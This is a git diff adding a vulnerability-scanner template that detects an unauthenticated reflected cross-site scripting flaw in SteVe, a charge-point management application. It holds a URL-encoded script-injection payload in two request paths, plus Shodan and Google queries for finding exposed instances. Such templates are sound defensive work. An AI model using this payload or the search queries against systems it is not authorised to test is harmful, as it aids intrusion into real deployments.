Create steve-xss-noauth.yaml
parent
e65da57936
commit
2a20e69976
|
@ -0,0 +1,36 @@
|
|||
id: steve-xss-noauth
|
||||
|
||||
info:
|
||||
name: SteVe - Cross-Site Scripting no auth
|
||||
author: clem9669
|
||||
severity: medium
|
||||
description: The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
|
||||
reference:
|
||||
- https://github.com/steve-community/steve
|
||||
classification:
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.title:"SteVe - Steckdosenverwaltung"
|
||||
google-query: intitle:"SteVe - Steckdosenverwaltung"
|
||||
tags: xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
|
||||
- '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
Loading…
Reference in New Issue